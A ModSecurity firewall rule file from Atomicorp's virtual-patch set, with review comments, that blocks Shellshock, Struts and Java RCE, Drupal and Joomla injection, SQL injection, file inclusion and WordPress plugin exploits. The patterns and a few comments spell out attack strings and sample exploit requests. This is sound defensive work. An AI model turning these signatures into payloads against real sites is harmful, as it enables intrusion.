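# --- Per-path rule exclusions ----------------------------------------------
# NOTE(review): the directives above the "Atomicorp" header below look like the
# tail of a separate exclusions file that was concatenated in front of the JITP
# rules. Each "pass,nolog,noauditlog" rule matches a lowercased request path and
# uses ctl:ruleRemovebyID to disable the listed rule ids for that transaction.
SecDefaultAction "log,deny,auditlog,phase:2,status:403"

# Gate: 95347 matches /viewtopic.php and skips the next directive (95348); for
# any other path 95348 jumps past END_RULES_95348, so 390761 is only evaluated
# for viewtopic.php requests.
SecRule REQUEST_FILENAME "/viewtopic\.php" "phase:2,id:95347,t:none,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:95348,t:none,pass,nolog,noauditlog,skipAfter:END_RULES_95348"
# Phase comes from SecDefaultAction above. The duplicated "log" action was dropped.
# NOTE(review): in the second alternative, "include\.*get\[" matches "include",
# zero or more literal dots, then "get[" -- if "include<anything>get[" was
# intended it should read "include.*get\["; confirm against the upstream rule.
SecRule REQUEST_URI "(?:highlight.*(?:\'\.|\x2527|\x27)|include\.*get\[.*\]\|=(?:ogg|gopher|data|php|zlib|(?:ht|f)tps?):/|(?:printf|system)\()" "log,deny,auditlog,t:none,t:urlDecodeUni,t:lowercase,t:replaceNulls,t:compressWhiteSpace,capture,id:390761,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: RFI Injection Exploit',logdata:'%{TX.0}'"
SecMarker END_RULES_95348

# NOTE(review): ctl:ruleRemovebyID only affects rules that are evaluated after it
# in the transaction, so these exclusions must be loaded before the rule ids they
# name (331702 and 303669 both appear later in this file) -- confirm include order.
SecRule REQUEST_FILENAME "/administrator/index\.php" "phase:2,id:95349,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603,ctl:ruleRemovebyID=390449"
SecRule REQUEST_FILENAME "/administrator/index2\.php" "phase:2,id:95350,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390605,ctl:ruleRemovebyID=390603"
SecRule REQUEST_FILENAME "/magento-1\.4/" "phase:2,id:95351,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630"
SecRule REQUEST_FILENAME "/gestor/download\.php" "phase:2,id:95352,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=314001"
SecRule REQUEST_FILENAME "/admindau/" "phase:2,id:95353,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390630"
SecRule REQUEST_FILENAME "/uos\.cgi" "phase:2,id:95354,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390761"
SecRule REQUEST_FILENAME "/clientes/index\.php" "phase:2,id:95355,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
SecRule REQUEST_FILENAME "/clientshosting\.php" "phase:2,id:95356,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
SecRule REQUEST_FILENAME "/import\.php" "phase:2,id:95357,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=393449"
SecRule REQUEST_FILENAME "/members/login\.php" "phase:2,id:95358,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390552"
SecRule REQUEST_FILENAME "/forum/viewtopic\.php" "phase:2,id:95359,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=390439"
SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95360,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=303669"
SecRule REQUEST_FILENAME "/previewemail\.php" "phase:2,id:95361,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=381239"
SecRule REQUEST_FILENAME "/wp-admin/post\.php" "phase:2,id:95362,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
SecRule REQUEST_FILENAME "/wp-admin/admin-ajax\.php" "phase:2,id:95363,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
SecRule REQUEST_FILENAME "/admin/moduleinterface\.php" "phase:2,id:95364,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"
SecRule REQUEST_FILENAME "/sendy/includes/list/edit\.php" "phase:2,id:95365,t:none,t:lowercase,pass,nolog,noauditlog,ctl:ruleRemovebyID=331702"

# http://www.atomicorp.com/
# Atomicorp (Gotroot.com) ModSecurity rules
# Virtual Just In Time Patches for Vulnerable Applications Rules
# for modsec 2.9.3 and up
#
# Copyright 2005-2024 by Atomicorp, Inc., all rights reserved.
# Redistribution is strictly prohibited in any form, including whole or in part.
# Distribution of this work or derivative of this work in any form is
# prohibited unless prior written permission is obtained from the
# copyright holder.
#
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS and CONTRIBUTORS AS IS
# and ANY EXPRESS or IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY and FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER or CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, or
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS or SERVICES; LOSS OF USE, DATA, or PROFITS; or BUSINESS
# INTERRUPTION) HOWEVER CAUSED and ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, or TORT (INCLUDING NEGLIGENCE or OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF
# THE POSSIBILITY OF SUCH DAMAGE.
#
#---ASL-CONFIG-FILE---
# Do not edit this file!
# This file is generated and changes will be overwritten.
#
# If you need to make changes to the rules, please follow the procedure here:
# http://www.atomicorp.com/wiki/index.php/Mod_security
#--------------------------------
# notes
#--------------------------------
# Conventions used throughout this file:
#  * "chain": every link of the chain must match before the disruptive action
#    declared on the first link (deny/status:403, or pass for log-only rules) fires.
#  * Gate idiom: a "pass,nolog,noauditlog,skip:1" rule matches the relevant path
#    or pattern and skips the SecAction that follows it; for every other request
#    that SecAction does "skipAfter:<marker>", so the rules between it and the
#    SecMarker are only evaluated for requests that passed the gate.
#  * "&VAR:name" counts occurrences of an argument/header; "@eq 0" means absent.
#--------------------------------
#start rules
#--------------------------------
# Phase 2 rules
#
#Bash attacks
# NOTE(review): these two rules run in phase:1 (request headers) despite the
# "Phase 2 rules" heading; at that point the request body has not been read,
# so ARGS and FILES_NAMES can only cover the query string -- presumably an
# intentional early reject, confirm.
SecRule REQUEST_HEADERS|FILES_NAMES|ARGS|ARGS_NAMES|!ARGS:/msg/|!ARGS:/message/|!ARGS:/txt/|!ARGS:/text/ "^ ?\( ?\) ?{" "phase:1,deny,id:330701,rev:3,severity:1,t:none,t:urlDecodeUni,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'"
SecRule REQUEST_LINE "^ ?\( ?\) ?{" "phase:1,deny,id:330702,rev:3,severity:1,t:none,t:compressWhiteSpace,status:403,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2014-6271 Bash Attack'"

#moved from embargoed rules Nov15 2024
# Matches the skip_onboarding endpoint only when user_id, login_nonce and
# redirect_to are all present in the request arguments.
SecRule REQUEST_URI "/wp-json/reallysimplessl/v1/two_fa/skip_onboarding" "id:331704,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules: Really Simple SSL authentication bypass attack',severity:1,rev:12,log,auditlog,chain"
SecRule &ARGS:user_id "@ge 1" "t:none,chain"
SecRule &ARGS:login_nonce "@ge 1" "t:none,chain"
SecRule &ARGS:redirect_to "@ge 1" "t:none"

#Moved from embargoed rules Jan 3 2022
# The !ARGS:/.../ entries exclude free-text fields (mail bodies, templates,
# SVG/content editors) from the JSON-operator check to limit false positives.
# "capture" was added: logdata references %{TX.0}, which is only populated by
# this rule's own match when capture is set.
SecRule REQUEST_FILENAME|REQUEST_COOKIES|!REQUEST_COOKIES:/__utm/|REQUEST_COOKIES_NAMES|ARGS_NAMES|ARGS|XML:/*|!ARGS:email_text|!ARGS:/message/|!ARGS:FormLayout|!ARGS:/svg/|!ARGS:/template/|!ARGS:/translate/|!ARGS:mepr-emails|!ARGS:wcf_email_body|!ARGS:/content/ "@rx [\"'`][\[\{].*[\]\}][\"'`].*(::.*jsonb?)?.*(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)|(?:(?:@|->?)>|<@|\?[&\|]?|#>>?|[<>]|<-)[\"'`][\[\{].*[\]\}][\"'`]|json_extract.*\(.*\)" "id:331702,phase:2,deny,status:403,t:none,t:urlDecodeUni,t:lowercase,t:removeWhitespace,capture,msg:'Atomicorp.com WAF Rules: Possible JSON-Based SQL Injection',logdata:'Matched Data: %{TX.0} found within %{MATCHED_VAR_NAME}: %{MATCHED_VAR}',tag:'SQLi',severity:1,rev:12,log,auditlog"

#/editBlackAndWhiteList
SecRule REQUEST_URI "editBlackAndWhiteList" "id:394669,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Shenzhen TVT Digital Technology Co. Ltd & OEM {DVR/NVR/IPC} API RCE attempt blocked',rev:1,severity:2"

#Known malware sign1
# Duplicated "status:403" actions removed from the three rules below.
SecRule ARGS_NAMES "^(?:e44e|wowex)$" "phase:2,deny,status:403,id:334071,rev:2,severity:1,t:none,t:compressWhiteSpace,t:lowercase,log,auditlog,msg:'Atomicorp.com WAF Rules: Known PHP code injection Attack'"
#Known malware sign1
#SecRule ARGS_NAMES "miglaa_update_(?:me|arr|barinfo)"
#SecRule ARGS_NAMES "miglaa_(?:update|stripe|sync)_"
SecRule ARGS_NAMES|ARGS:action "miglaa?_" "phase:2,deny,status:403,id:334072,rev:5,severity:1,t:none,t:urlDecodeUni,t:lowercase,log,auditlog,msg:'Atomicorp.com WAF Rules: CVE-2019-6703 Attack blocked'"
#vulnerability scanner
SecRule ARGS "\'\|\|\'" "phase:2,deny,status:403,id:334073,rev:1,severity:1,t:none,t:urlDecodeUni,t:removewhitespace,log,auditlog,msg:'Atomicorp.com WAF Rules: Injection Attack blocked'"

#CryptoPHP
# 394667: POST whose Content-Disposition header names serverkey, data and key,
# sent without a User-Agent header.
SecRule REQUEST_METHOD "@streq POST" "chain,id:394667,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2"
SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?serverkey" "t:none,t:lowercase,t:compressWhiteSpace,chain"
SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?data" "t:none,t:lowercase,t:compressWhiteSpace,chain"
SecRule REQUEST_HEADERS:Content-Disposition "form-data; name ?= ?\"?key" "t:none,t:lowercase,t:compressWhiteSpace,chain"
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"
# 394666: same shape, but with serverKey, data and key as individual request
# headers (each present exactly once) and no User-Agent.
SecRule REQUEST_METHOD "@streq POST" "chain,id:394666,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible CryptoPHP backdoor attempt',rev:1,severity:2"
SecRule &REQUEST_HEADERS:serverKey "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:data "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:key "@eq 1" "t:none,chain"
SecRule &REQUEST_HEADERS:User-Agent "@eq 0" "t:none"

# Gate: the RFD rule is only evaluated when the URI contains ".bat" or ".cmd".
SecRule REQUEST_URI "@pm .bat .cmd" "id:357876,phase:2,t:none,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:359931,t:none,pass,nolog,noauditlog,skipAfter:END_RFD"
#RFD attacks
SecRule REQUEST_URI "@rx (?i:^[^?]*\.(?:bat|cmd)(?: |$))" "phase:2,id:312863,t:none,t:urlDecodeUni,deny,log,auditlog,status:403,msg:'Atomicorp.com WAF Rules: Potential Reflected File Download (RFD) Attack.'"
SecMarker END_RFD

#Struts RCE attack
# Gate: cheap @pm keyword prefilter; the regex rules up to END_STRUTS only run
# when at least one keyword is present in the URI, arguments, XML body or
# Content-Type header.
SecRule REQUEST_URI|ARGS|XML:/*|REQUEST_HEADERS:Content-Type "@pm inputstream ognl sun.misc opensymphony beanmap utility.execute allowstaticmethodaccess memberaccess cmd getparameter runtime unmarshaller java base64 org.apache.tomcat" "phase:2,id:368829,t:none,t:urlDecodeUni,multimatch,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:361112,t:none,pass,nolog,noauditlog,skipAfter:END_STRUTS"
#CVE-2020-17530
SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:339207,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,multimatch,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts CVE-2020-17530 RCE attack blocked'"
SecRule ARGS|XML:/* "(?:collections\.beanmap|template\.utility\.execute)" "t:none,t:urlDecodeUni,t:lowercase,multimatch"
#java.lang.Runtime@getRuntime().exec
SecRule REQUEST_URI "\.action" "chain,phase:2,status:403,deny,log,auditlog,id:337207,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'"
SecRule ARGS|XML:/* "(?:java\.lang\.runtime@getruntime\(\)\.exec\(|com\.opensymphony\.xwork)" "t:none,t:urlDecodeUni,t:lowercase"
SecRule ARGS|XML:/* "(?:sun\.misc\.base64decoder|unmarshaller\.base64data|java.lang.runtime.{1,200}exec\()" "chain,phase:2,status:403,deny,log,auditlog,id:337206,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
SecRule ARGS|XML:/* "javax?\.(?:io\.fileoutputstream|imageio\.spi\.|lang\.processbuilder)" "t:none,t:lowercase,t:urlDecodeUni"
SecRule ARGS|XML:/* "\${\(\#_memberaccess\[\"allowstaticmethodaccess" "phase:2,status:403,deny,log,auditlog,id:337208,rev:6,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
SecRule ARGS|XML:/* "(?:java\.lang\.runtime.{1,200}exec\(|request\.getparameter\(\"cmd\")" "phase:2,status:403,deny,log,auditlog,id:337210,rev:8,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java RCE attack blocked'"
SecRule ARGS|XML:/*|REQUEST_HEADERS:Content-Type "\)\.\(#cmd=\'" "phase:2,status:403,deny,log,auditlog,id:337218,rev:1,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removewhitespace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Struts RCE attack blocked'"
SecRule REQUEST_URI|ARGS|XML:/* "java\.(?:lang|util)" "chain,phase:2,status:403,deny,log,auditlog,id:337211,rev:4,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Confluence Pre-Auth Remote Code Execution via OGNL Injection (CVE-2022-26134) blocked'"
SecRule REQUEST_URI|ARGS|XML:/* "(?:getinputstream|getruntime\(\)\.exec)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"
#Generic java code injection
SecRule REQUEST_URI|ARGS|XML:/* "javax?\.(?:lang|util|script)" "chain,phase:2,status:403,deny,log,auditlog,id:337209,rev:5,severity:2,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Java remote code injection blocked'"
SecRule REQUEST_URI|ARGS|XML:/* "(?:p\.command\((\'cmd|[cbd]?a?sh)|base64\.decoder\(\)\.decode|getinputstream|getruntime\(\)\.exec\(|processbuilder\(\)\.command|nio\.file\.files)" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removewhitespace"
SecMarker END_STRUTS

#RCE Joomla rule not needed
#Only added to give more information to the threat intelligence system that this was specifically a Joomla RCE attack
#Rule 347195 already protected against this vulnerability
SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR|ARGS:filter-search "(?:drivermysql|jfactory|databasedriver|(}_|^\:))" "phase:2,status:403,deny,log,auditlog,id:337106,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'"
SecRule REQUEST_HEADERS:Referer "^{_.*(?:databasedriver|drivermysql|jfactory)" "phase:2,status:403,deny,log,auditlog,id:337107,rev:2,severity:2,t:none,t:urlDecodeUni,t:lowercase,t:removeWhiteSpace,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Joomla RCE attack blocked'"
#Moved to JITP rules from generic rules to trigger after 337106 so the TI can see specific cases of joomla only RCE attacks
# NOTE(review): the directive below is truncated in this copy -- the @pm word
# list has no closing quote and the action list (id, phase, disruptive action,
# msg) is missing, so it cannot load as written. It is commented out here;
# restore the complete directive from the upstream rule set.
#SecRule REQUEST_HEADERS:User-Agent|REQUEST_HEADERS:X_FORWARDED_FOR "@pm php chr fopen fwrite globals system passthru serialize include php_uname popen proc_open mysql_query exec eval proc_nice proc_terminate proc_get_status proc_close pfsockopen leak apache_child_terminate posix_kill posix_mkfifo posix_setpgid posix_setsid posix_setuid phpinfo preg_ decode_base64 base64_decode base64_url_decode rot13

# Redundant second "deny" removed from the rules below that carried
# "deny,...,deny,status:403"; the disruptive action is unchanged.
SecRule REQUEST_URI "/manager/\?a=system" "phase:2,t:none,t:urlDecodeUni,t:lowercase,log,deny,status:403,auditlog,id:336478,rev:2,severity:2,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: ModX Revolution 2.3.5-pl Cross Site Scripting attack',chain"
SecRule ARGS:file "(?:script|\} ?\) ?\;)" "t:none,t:urlDecodeUni,t:lowercase"

#?gf_page=upload
SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391742,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms 1.8.19 Shell Upload Attack'"
SecRule ARGS:name "\.ph(?:p|t)" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "\?gf_page=upload" "chain,capture,phase:2,deny,log,auditlog,id:391743,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress Gravity Forms 1.8.19 Shell Upload Attack'"
SecRule ARGS:gform_unique_id "\.\./\.\." "t:none,t:urlDecodeUni,t:lowercase"

#WP 4.7 exploit
# 390751: post id argument that is not purely numeric; 390753: post id
# containing a letter after lowercasing.
SecRule REQUEST_URI "/wp/v2/posts/" "chain,capture,phase:2,deny,log,auditlog,id:390751,rev:2,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'"
SecRule ARGS:id "!(^[0-9]+$)" "t:none,t:urlDecodeUni"
#WP 4.7 exploit
SecRule REQUEST_URI "/wp/v2/posts/" "chain,capture,phase:2,deny,log,auditlog,id:390753,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API remote code injection attack',logdata:'%{TX.0}'"
SecRule ARGS:id "[a-z]" "t:none,t:urlDecodeUni,t:lowercase"
#/wp-json/wp/v2/posts/2549
#SecRule REQUEST_URI "/wp/v2/posts/[0-9]+" "chain,capture,phase:2,deny,log,auditlog,id:390752,rev:3,t:none,t:urlDecodeUni,t:lowercase,deny,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Wordpress REST API probe',logdata:'%{TX.0}'"
#SecRule REQUEST_METHOD "GET" "t:none"

#drupal JITPs
#moved from encrypted embargoed rules
# Blocks Drupal render-array callback keys (#submit, #validate, #pre_render, ...)
# arriving as argument or cookie names, in plain or bracketed form.
SecRule REQUEST_FILENAME "(?:index\.php|\/$)" "chain,capture,phase:2,deny,log,auditlog,id:390755,rev:2,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none"
SecRule ARGS_NAMES|REQUEST_COOKIES_NAMES "(?:^\#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|(?:value|access)_callback$)|\[(?:\'|\")?#(?:submit|validate|p(?:re_render|ost_render|rocess)|element_validate|after_build|value_callback))" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,t:removenulls,t:removeWhiteSpace"
#moved from encrypted embargoed rules
# Double-encoded "#" ("[%2523") in arguments of a ?q= request; note the last
# link deliberately has no urlDecodeUni so the encoded form is what is matched.
SecRule REQUEST_URI "/\?q=" "chain,capture,phase:2,deny,log,auditlog,id:390766,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "chain,t:none"
SecRule ARGS|ARGS_NAMES "\[\%2523" "t:none,t:removeWhiteSpace"
#moved from encrypted embargoed rules
SecRule REQUEST_URI "/\?q=file/ajax/actions/cancel/#options" "chain,capture,phase:2,deny,log,auditlog,id:390767,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Drupal Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule REQUEST_METHOD "^(?:GET|POST|HEAD)$" "t:none"

#/?a=fetch&content=%3Cphp%3Edie(@md5(HelloThinkCMF))%3C/php%3E
SecRule ARGS:a "^fetch$" "chain,capture,phase:2,deny,log,auditlog,id:390768,t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PHP Code Injection attack blocked',logdata:'%{TX.0}'"
SecRule ARGS:content "php" "t:none,t:utf8toUnicode,t:urlDecodeUni,t:lowercase"

#PHP applications
# Gate: everything down to END_PHP_JITP (marker is beyond this excerpt) only
# runs for .php/.phtml/.pht filenames and only for POST, GET and HEAD.
SecRule REQUEST_FILENAME "\.ph(?:p|tml|t)" "id:333865,phase:2,t:none,t:urlDecodeUni,t:lowercase,pass,nolog,noauditlog,skip:1"
SecAction "phase:2,id:309000,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP"
SecRule REQUEST_METHOD "!(POST|GET|HEAD)" "phase:2,id:309200,t:none,pass,nolog,noauditlog,skipAfter:END_PHP_JITP"

SecRule ARGS:action "plugins/myeasybackup/meb_download\.php" "chain,phase:2,deny,log,auditlog,id:322211,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP myEasybackup directory recursion attack ',severity:2"
SecRule ARGS:dwn_file "\.\./" "t:none,t:urlDecodeUni,t:normalizePath"
SecRule REQUEST_URI "/util/php/eval-stdin\.php" "phase:2,deny,log,auditlog,id:393782,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: PGP eval stdin attack blocked',severity:2"
SecRule REQUEST_URI "connector\.minimal\.php" "phase:2,deny,log,auditlog,id:393781,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress File Manager Plugin attack blocked',severity:2"
# Upload to the live-chat remote_upload endpoint with a cid POST field and a
# filename carrying a server-side or executable extension.
SecRule REQUEST_FILENAME "wp-json/wp_live_chat_support/v1/remote_upload" "chain,phase:2,id:322121,rev:2,log,deny,status:403,auditlog,t:none,t:urlDecodeUni,t:lowercase,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP Live Chat File Upload attack',severity:2"
SecRule &ARGS_POST:cid "@ge 1" "chain,t:none"
SecRule FILES "\.(?:(?:p|s|x|d)?h(?:p[2-7s]?|(?:tmp?)?l?)|dll|exe|js|p(?:l|y)|rb|sh|cgi|com|bat|aspx?)" "t:none,t:urlDecodeUni,t:lowercase"
#tccj-update=update
#tccj-content javascript
SecRule ARGS:tccj-update "update" "chain,phase:2,deny,log,auditlog,id:393780,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress Possible TC custom javscript injection attack blocked',severity:2"
SecRule ARGS:tccj-content "script" "t:none,t:urlDecodeUni,t:lowercase"
SecRule REQUEST_URI "wp-admin/profile\.php" "chain,id:334616,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: Possible Advanced Access Manager attack attempt',rev:1,severity:2"
SecRule &ARGS:/aam_user_roles/ "@eq 1" "t:none"
#WP User Avatar plugin privilege escalation attack attempt
# NOTE(review): the last link negates @contains over the REQUEST_COOKIES_NAMES
# collection; ModSecurity evaluates each cookie name separately, so it is true
# as soon as any cookie whose name lacks "wordpress_sec" is present, not only
# when no wordpress_sec cookie exists. If "no auth cookie" was the intent,
# "&REQUEST_COOKIES_NAMES:/wordpress_sec/ "@eq 0"" expresses it -- confirm.
SecRule REQUEST_METHOD "POST" "chain,id:334617,phase:2,t:none,deny,auditlog,log,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WP User Avatar plugin privilege escalation attack attempt',rev:1,severity:2"
SecRule REQUEST_URI "/wp-admin/profile\.php" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:action "update" "t:none,t:lowercase,chain"
SecRule ARGS "administrator" "t:none,t:lowercase,chain"
SecRule &ARGS:/^members_user_roles\[\]/ "@eq 0" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule &ARGS:houzez_role "@eq 0" "t:none,t:lowercase,chain"
SecRule REQUEST_COOKIES_NAMES "!@contains wordpress_sec" "t:none"

#/zplug/ajax_asyn_link.old.php?url=../admin/opacadminpwd.php
# Local-file-inclusion checks: a traversal sequence or an absolute path into
# /etc, /root, /var or /opt in the named argument.
SecRule REQUEST_URI "jax_async?_link" "chain,phase:2,deny,log,auditlog,id:393750,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress ajax_asyn_link LFI attack blocked',severity:2"
SecRule ARGS:url "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "wp-admin/tools\.php" "chain,phase:2,deny,log,auditlog,id:393758,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2"
SecRule ARGS:page "backup_manager" "t:none,t:urlDecodeUni,t:lowercase,chain"
SecRule ARGS:download_backup_file "\.\./" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "wp-content/plugins/db-backup/download\.php" "chain,phase:2,deny,log,auditlog,id:393759,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress backup manager LFI attack blocked',severity:2"
SecRule ARGS:file "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "ajax_shortcode_pattern\.php" "chain,phase:2,deny,log,auditlog,id:393771,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress shortcode LFI attack blocked',severity:2"
SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "adaptive-images-script\.php" "chain,phase:2,deny,log,auditlog,id:393772,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: WordPress adaptive-images-script.php LFI attack blocked',severity:2"
SecRule ARGS:ajax_path "(?:\.\.\/|^/(?:etc|root|var|opt)/)" "t:none,t:urlDecodeUni,t:cmdline"
SecRule REQUEST_URI "/opac/search_rss\.php" "chain,phase:2,deny,log,auditlog,id:393760,rev:1,t:none,t:urlDecodeUni,t:lowercase,status:403,msg:'Atomicorp.com WAF Rules - Virtual Just In Time Patch: OPAC RSS Search SQL injection attack blocked',severity:2"
SecRule ARGS:location "(?:\bselect\b|\bchr\()" "t:none,t:urlDecodeUni,t:removecomments,t:removeWhiteSpace,t:lowercase"
#/html2canvasproxy.php?url=http://google.com
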